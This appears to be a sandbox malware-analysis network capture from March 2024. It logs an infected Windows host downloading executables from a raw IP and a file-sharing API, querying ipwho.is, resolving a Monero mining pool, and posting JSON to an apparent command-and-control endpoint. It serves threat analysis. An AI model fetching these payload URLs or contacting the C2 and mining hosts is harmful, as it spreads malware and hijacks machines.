• [US] DNS 65.179.17.96.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request
  65.179.17.96.in-addr.arpa
  IN PTR
  Response
  65.179.17.96.in-addr.arpa
  IN PTR
  a96-17-179-65.deploy.static.akamaitechnologies.com
• [US] DNS 95.221.229.192.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request
  95.221.229.192.in-addr.arpa
  IN PTR
  Response
• [US] DNS 151.66.156.94.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request
  151.66.156.94.in-addr.arpa
  IN PTR
  Response
• [US] DNS 241.154.82.20.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request
  241.154.82.20.in-addr.arpa
  IN PTR
  Response
• [NL] GET http://94.156.66.151/icons/unknown.gif
  chrome.exe
                                                                                                                          Remote address:
                                                                                                                          94.156.66.151:80
                                                                                                                          Request
                                                                                                                          GET /icons/unknown.gif HTTP/1.1
                                                                                                                          Host: 94.156.66.151
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Referer: http://94.156.66.151/
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Response
                                                                                                                          HTTP/1.1 200 OK
                                                                                                                          Date: Mon, 18 Mar 2024 18:10:20 GMT
                                                                                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                          Last-Modified: Sat, 20 Nov 2004 21:16:24 GMT
                                                                                                                          ETag: "f5-3e95722b75a00"
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Content-Length: 245
                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: image/gif
                                                                                                                        • flag-nl
                                                                                                                          GET
                                                                                                                          http://94.156.66.151/favicon.ico
                                                                                                                          chrome.exe
                                                                                                                          Remote address:
                                                                                                                          94.156.66.151:80
                                                                                                                          Request
                                                                                                                          GET /favicon.ico HTTP/1.1
                                                                                                                          Host: 94.156.66.151
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Referer: http://94.156.66.151/
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Response
                                                                                                                          HTTP/1.1 404 Not Found
                                                                                                                          Date: Mon, 18 Mar 2024 18:10:20 GMT
                                                                                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                          Content-Length: 299
                                                                                                                          Keep-Alive: timeout=5, max=99
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                        • flag-nl
                                                                                                                          GET
                                                                                                                          http://94.156.66.151/gfgghdhwhatsup.exe
                                                                                                                          chrome.exe
                                                                                                                          Remote address:
                                                                                                                          94.156.66.151:80
                                                                                                                          Request
                                                                                                                          GET /gfgghdhwhatsup.exe HTTP/1.1
                                                                                                                          Host: 94.156.66.151
                                                                                                                          Connection: keep-alive
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                          Referer: http://94.156.66.151/
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Response
                                                                                                                          HTTP/1.1 200 OK
                                                                                                                          Date: Mon, 18 Mar 2024 18:10:25 GMT
                                                                                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                          Last-Modified: Thu, 14 Mar 2024 22:03:19 GMT
                                                                                                                          ETag: "4fc200-613a60f22acfa"
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Content-Length: 5227008
                                                                                                                          Keep-Alive: timeout=5, max=98
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-msdownload
                                                                                                                        • flag-nl
                                                                                                                          GET
                                                                                                                          http://94.156.66.151/icons/binary.gif
                                                                                                                          chrome.exe
                                                                                                                          Remote address:
                                                                                                                          94.156.66.151:80
                                                                                                                          Request
                                                                                                                          GET /icons/binary.gif HTTP/1.1
                                                                                                                          Host: 94.156.66.151
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Referer: http://94.156.66.151/
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Response
                                                                                                                          HTTP/1.1 200 OK
                                                                                                                          Date: Mon, 18 Mar 2024 18:10:20 GMT
                                                                                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                          Last-Modified: Sat, 20 Nov 2004 21:16:24 GMT
                                                                                                                          ETag: "f6-3e95722b75a00"
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Content-Length: 246
                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: image/gif
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          41.110.16.96.in-addr.arpa
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          41.110.16.96.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          Response
                                                                                                                          41.110.16.96.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          a96-16-110-41deploystaticakamaitechnologiescom
                                                                                                                        • flag-nl
                                                                                                                          GET
                                                                                                                          http://94.156.66.151/ghfhhminfudk.exe
                                                                                                                          chrome.exe
                                                                                                                          Remote address:
                                                                                                                          94.156.66.151:80
                                                                                                                          Request
                                                                                                                          GET /ghfhhminfudk.exe HTTP/1.1
                                                                                                                          Host: 94.156.66.151
                                                                                                                          Connection: keep-alive
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                          Referer: http://94.156.66.151/
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Response
                                                                                                                          HTTP/1.1 200 OK
                                                                                                                          Date: Mon, 18 Mar 2024 18:10:27 GMT
                                                                                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                          Last-Modified: Fri, 15 Mar 2024 10:31:48 GMT
                                                                                                                          ETag: "a6400-613b083e479f8"
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Content-Length: 680960
                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-msdownload
                                                                                                                        • flag-nl
                                                                                                                          GET
                                                                                                                          http://94.156.66.151/hghghjhfhleviticus.exe
                                                                                                                          chrome.exe
                                                                                                                          Remote address:
                                                                                                                          94.156.66.151:80
                                                                                                                          Request
                                                                                                                          GET /hghghjhfhleviticus.exe HTTP/1.1
                                                                                                                          Host: 94.156.66.151
                                                                                                                          Connection: keep-alive
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                          Referer: http://94.156.66.151/
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Response
                                                                                                                          HTTP/1.1 200 OK
                                                                                                                          Date: Mon, 18 Mar 2024 18:10:27 GMT
                                                                                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                          Last-Modified: Fri, 15 Mar 2024 17:55:19 GMT
                                                                                                                          ETag: "86e00-613b6b608b55a"
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Content-Length: 552448
                                                                                                                          Keep-Alive: timeout=5, max=99
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-msdownload
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          241.150.49.20.in-addr.arpa
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          241.150.49.20.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          Response
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          g.bing.com
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          g.bing.com
                                                                                                                          IN A
                                                                                                                          Response
                                                                                                                          g.bing.com
                                                                                                                          IN CNAME
                                                                                                                          g-bing-com.a-0001.a-msedge.net
  g-bing-com.a-0001.a-msedge.net IN CNAME dual-a-0001.a-msedge.net
  dual-a-0001.a-msedge.net IN A 204.79.197.200
  dual-a-0001.a-msedge.net IN A 13.107.21.200
• flag-us  GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid=
  Remote address: 204.79.197.200:443
  Request
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
  Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MUID=28F3B267E1F169630259A621E0116881; domain=.bing.com; expires=Sat, 12-Apr-2025 18:10:32 GMT; path=/; SameSite=None; Secure; Priority=High;
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 69AD8C91641C4637BE9D81334AC1B11E Ref B: LON04EDGE1015 Ref C: 2024-03-18T18:10:32Z
    date: Mon, 18 Mar 2024 18:10:32 GMT
• flag-us  GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid=
  Remote address: 204.79.197.200:443
  Request
    GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=28F3B267E1F169630259A621E0116881
  Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MSPTC=7T7-s9hhozesInHRo_Q3m9vYGkHjDhNz6hK5Onj22nQ; domain=.bing.com; expires=Sat, 12-Apr-2025 18:10:33 GMT; path=/; Partitioned; secure; SameSite=None
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: AB22E6D1636D4DEC91153BB0C4340ACB Ref B: LON04EDGE1015 Ref C: 2024-03-18T18:10:33Z
    date: Mon, 18 Mar 2024 18:10:32 GMT
• flag-us  GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid=
  Remote address: 204.79.197.200:443
  Request
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=28F3B267E1F169630259A621E0116881; MSPTC=7T7-s9hhozesInHRo_Q3m9vYGkHjDhNz6hK5Onj22nQ
  Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: CE5DA02DBABC4DED921EFC9D16F83848 Ref B: LON04EDGE1015 Ref C: 2024-03-18T18:10:33Z
    date: Mon, 18 Mar 2024 18:10:32 GMT
• flag-us  DNS 200.197.79.204.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request
    200.197.79.204.in-addr.arpa IN PTR
  Response
    200.197.79.204.in-addr.arpa IN PTR a-0001.a-msedge.net
• flag-us  DNS 232.168.11.51.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request
    232.168.11.51.in-addr.arpa IN PTR
  Response (empty)
• flag-us  DNS gjhfhgdg.insane.wang
  Process: vbc.exe
  Remote address: 8.8.8.8:53
  Request
    gjhfhgdg.insane.wang IN A
  Response
    gjhfhgdg.insane.wang IN A 94.156.66.151
• flag-us  DNS 157.123.68.40.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request
    157.123.68.40.in-addr.arpa IN PTR
  Response (empty)
• flag-us  DNS 28.118.140.52.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request
    28.118.140.52.in-addr.arpa IN PTR
  Response (empty)
• flag-us  DNS 171.39.242.20.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request
    171.39.242.20.in-addr.arpa IN PTR
  Response (empty)
• flag-us  DNS 18.134.221.88.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request
    18.134.221.88.in-addr.arpa IN PTR
  Response
    18.134.221.88.in-addr.arpa IN PTR a88-221-134-18.deploy.static.akamaitechnologies.com
• flag-us  DNS 183.142.211.20.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request
    183.142.211.20.in-addr.arpa IN PTR
  Response (empty)
• flag-us  DNS api.filedoge.com
  Process: vbc.exe
  Remote address: 8.8.8.8:53
  Request
    api.filedoge.com IN A
  Response
    api.filedoge.com IN A 49.13.193.134
• flag-de  GET https://api.filedoge.com/download/1591130eaa3b8a96895bff8d686e7ec2697f986974508c85f0b051191a853aa069fe7ce03179e1c20ec7
  Process: vbc.exe
  Remote address: 49.13.193.134:443
  Request
    GET /download/1591130eaa3b8a96895bff8d686e7ec2697f986974508c85f0b051191a853aa069fe7ce03179e1c20ec7 HTTP/1.1
    Host: api.filedoge.com
    Connection: Keep-Alive
  Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Mon, 18 Mar 2024 18:10:55 GMT
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: Express
    Access-Control-Allow-Origin: https://filedoge.com
    Vary: Origin
    Content-Disposition: attachment; filename="fdfgfs.exe"
• flag-us  DNS 134.193.13.49.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request
    134.193.13.49.in-addr.arpa IN PTR
  Response
    134.193.13.49.in-addr.arpa IN PTR static.134.193.13.49.clients.your-server.de
• flag-us  DNS ipwho.is
  Process: dfsdff.exe
  Remote address: 8.8.8.8:53
  Request
    ipwho.is IN A
  Response
    ipwho.is IN A 195.201.57.90
• flag-de  GET https://ipwho.is/
  Process: dfsdff.exe
  Remote address: 195.201.57.90:443
  Request
    GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
    Host: ipwho.is
    Connection: Keep-Alive
  Response
    HTTP/1.1 200 OK
    Date: Mon, 18 Mar 2024 18:11:14 GMT
    Content-Type: application/json; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Server: ipwhois
    Access-Control-Allow-Headers: *
    X-Robots-Tag: noindex
• flag-us  DNS 75.179.17.96.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request
    75.179.17.96.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          Response
                                                                                                                          75.179.17.96.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          a96-17-179-75deploystaticakamaitechnologiescom
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          75.179.17.96.in-addr.arpa
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          75.179.17.96.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          90.57.201.195.in-addr.arpa
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          90.57.201.195.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          Response
                                                                                                                          90.57.201.195.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          static9057201195clients your-serverde
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          xmr-eu1.nanopool.org
                                                                                                                          explorer.exe
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          xmr-eu1.nanopool.org
                                                                                                                          IN A
                                                                                                                          Response
                                                                                                                          xmr-eu1.nanopool.org
                                                                                                                          IN A
                                                                                                                          162.19.224.121
                                                                                                                          xmr-eu1.nanopool.org
                                                                                                                          IN A
                                                                                                                          51.15.58.224
                                                                                                                          xmr-eu1.nanopool.org
                                                                                                                          IN A
                                                                                                                          54.37.137.114
                                                                                                                          xmr-eu1.nanopool.org
                                                                                                                          IN A
                                                                                                                          51.15.65.182
                                                                                                                          xmr-eu1.nanopool.org
                                                                                                                          IN A
                                                                                                                          51.89.23.91
                                                                                                                          xmr-eu1.nanopool.org
                                                                                                                          IN A
                                                                                                                          146.59.154.106
                                                                                                                          xmr-eu1.nanopool.org
                                                                                                                          IN A
                                                                                                                          163.172.154.142
                                                                                                                          xmr-eu1.nanopool.org
                                                                                                                          IN A
                                                                                                                          54.37.232.103
                                                                                                                          xmr-eu1.nanopool.org
                                                                                                                          IN A
                                                                                                                          141.94.23.83
                                                                                                                          xmr-eu1.nanopool.org
                                                                                                                          IN A
                                                                                                                          51.15.193.130
                                                                                                                          xmr-eu1.nanopool.org
                                                                                                                          IN A
                                                                                                                          212.47.253.124
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          xmr-eu1.nanopool.org
                                                                                                                          explorer.exe
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          xmr-eu1.nanopool.org
                                                                                                                          IN A
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          cf-protected-l7.com
                                                                                                                          explorer.exe
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          cf-protected-l7.com
                                                                                                                          IN A
                                                                                                                          Response
                                                                                                                          cf-protected-l7.com
                                                                                                                          IN A
                                                                                                                          134.255.231.136
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          136.231.255.134.in-addr.arpa
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          136.231.255.134.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          Response
                                                                                                                          136.231.255.134.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          lavender-leopard-40929zapcloud
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          91.23.89.51.in-addr.arpa
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          91.23.89.51.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          Response
                                                                                                                          91.23.89.51.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          vps-2ced4041vpsovhnet
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          91.23.89.51.in-addr.arpa
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          91.23.89.51.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          53.179.17.96.in-addr.arpa
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          53.179.17.96.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          Response
                                                                                                                          53.179.17.96.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          a96-17-179-53deploystaticakamaitechnologiescom
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          chromewebstore.googleapis.com
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          chromewebstore.googleapis.com
                                                                                                                          IN A
                                                                                                                          Response
                                                                                                                          chromewebstore.googleapis.com
                                                                                                                          IN A
                                                                                                                          172.217.168.234
                                                                                                                          chromewebstore.googleapis.com
                                                                                                                          IN A
                                                                                                                          142.250.179.170
                                                                                                                          chromewebstore.googleapis.com
                                                                                                                          IN A
                                                                                                                          142.250.179.202
                                                                                                                          chromewebstore.googleapis.com
                                                                                                                          IN A
                                                                                                                          142.251.36.10
                                                                                                                          chromewebstore.googleapis.com
                                                                                                                          IN A
                                                                                                                          142.251.39.106
                                                                                                                          chromewebstore.googleapis.com
                                                                                                                          IN A
                                                                                                                          172.217.23.202
                                                                                                                          chromewebstore.googleapis.com
                                                                                                                          IN A
                                                                                                                          216.58.208.106
                                                                                                                          chromewebstore.googleapis.com
                                                                                                                          IN A
                                                                                                                          216.58.214.10
                                                                                                                          chromewebstore.googleapis.com
                                                                                                                          IN A
                                                                                                                          142.250.179.138
                                                                                                                          chromewebstore.googleapis.com
                                                                                                                          IN A
                                                                                                                          142.251.36.42
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          chromewebstore.googleapis.com
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          chromewebstore.googleapis.com
                                                                                                                          IN Unknown
                                                                                                                          Response
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          234.168.217.172.in-addr.arpa
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          234.168.217.172.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          Response
                                                                                                                          234.168.217.172.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          ams15s40-in-f101e100net
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          23.236.111.52.in-addr.arpa
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          23.236.111.52.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          Response
                                                                                                                        • flag-us
DNS
88.156.103.20.in-addr.arpa
Remote address: 8.8.8.8:53
Request
88.156.103.20.in-addr.arpa IN PTR
Response
• DE
POST
http://cf-protected-l7.com/api/endpoint.php
explorer.exe
Remote address: 134.255.231.136:80
Request
POST /api/endpoint.php HTTP/1.1
Accept: */*
Connection: close
Content-Length: 514
Content-Type: application/json
Host: cf-protected-l7.com
User-Agent: cpp-httplib/0.12.6
Response
HTTP/1.1 200 OK
Date: Tue, 19 Mar 2024 02:12:11 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
X-Robots-Tag: noindex, nofollow
X-Powered-By: PHP/8.0.30
Content-Length: 17
Connection: close
Content-Type: text/html; charset=UTF-8
• US
DNS
26.35.223.20.in-addr.arpa
Remote address: 8.8.8.8:53
Request
26.35.223.20.in-addr.arpa IN PTR
Response
• US
DNS
tse1.mm.bing.net
Remote address: 8.8.8.8:53
Request
tse1.mm.bing.net IN A
Response
tse1.mm.bing.net IN CNAME mm-mm.bing.net.trafficmanager.net
mm-mm.bing.net.trafficmanager.net IN CNAME dual-a-0001.a-msedge.net
dual-a-0001.a-msedge.net IN A 204.79.197.200
dual-a-0001.a-msedge.net IN A 13.107.21.200
• US
GET
https://tse1.mm.bing.net/th?id=OADD2.10239340418570_1AILBHE008ZL9RHPC&pid=21.2&w=1080&h=1920&c=4
Remote address: 204.79.197.200:443
Request
GET /th?id=OADD2.10239340418570_1AILBHE008ZL9RHPC&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
Response
HTTP/2.0 200
cache-control: public, max-age=2592000
content-length: 623110
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: E299941DC48E458696FE99281CD99767 Ref B: LON04EDGE1118 Ref C: 2024-03-18T18:12:21Z
date: Mon, 18 Mar 2024 18:12:21 GMT
• US
GET
https://tse1.mm.bing.net/th?id=OADD2.10239360607761_1X7SCS2IJANBBPHGW&pid=21.2&w=1920&h=1080&c=4
Remote address: 204.79.197.200:443
Request
GET /th?id=OADD2.10239360607761_1X7SCS2IJANBBPHGW&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
Response
HTTP/2.0 200
cache-control: public, max-age=2592000
content-length: 519937
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 5A0F4B48C442493CBB019D4C6DA35287 Ref B: LON04EDGE1118 Ref C: 2024-03-18T18:12:21Z
date: Mon, 18 Mar 2024 18:12:21 GMT
• US
GET
https://tse1.mm.bing.net/th?id=OADD2.10239340418569_13408TD3CSPQQLS8W&pid=21.2&w=1920&h=1080&c=4
Remote address: 204.79.197.200:443
Request
GET /th?id=OADD2.10239340418569_13408TD3CSPQQLS8W&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
